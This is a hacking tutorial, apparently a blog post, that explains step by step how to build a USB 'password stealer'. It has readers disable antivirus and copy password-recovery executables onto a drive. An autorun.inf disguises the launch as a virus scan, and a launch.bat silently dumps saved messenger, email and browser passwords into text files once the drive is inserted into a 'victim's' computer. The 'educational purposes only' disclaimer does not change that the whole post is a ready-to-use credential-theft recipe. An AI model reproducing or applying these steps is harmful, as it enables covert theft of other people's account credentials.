This post is of-course for educational purposes only.
Although the title of this post implies that this is designed for a USB, any device like an MP3 player or a mobile phone can be used as they can all execute programs.
We know that windows stores most of its passwords on daily basis , such as MSN messenger passwords,Yahoo passwords,Facebook passwords etc. Most people hate to type passwords over and over again; so when that little tick box appears that asks to save/remember password the opportunity is jumped at, this shall be their undoing.
Things you will need?
Note: Before downloading the following apps you might want to disable your Anti Virus, as most of these will appear as a suspicious file.
MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:
- MSN Messenger
- Windows Messenger (In Windows XP)
- Windows Live Messenger (In Windows XP/Vista/7)
- Yahoo Messenger (Versions 5.x and 6.x)
- Google Talk
- ICQ Lite 4.x/5.x/2003
- AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
- Trillian Astra
- MySpace IM
Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for:
- Outlook Express
- Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
- Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
- Windows Mail
- Windows Live Mail
- Netscape 6.x/7.x (If the password is not encrypted with master password)
- Mozilla Thunderbird (If the password is not encrypted with master password)
- Group Mail Free
- Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
- Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
- Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
IE Passview - IE passview is a small program that helps us view stored passwords in Internet Explorer.
Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.
Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox
Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:
1.First of all download all 5 tools and copy the executable files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it.
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad file and rename it from New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready, all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.
After this you can see saved password in .TXT files on the USB
Have fun and hack responsibly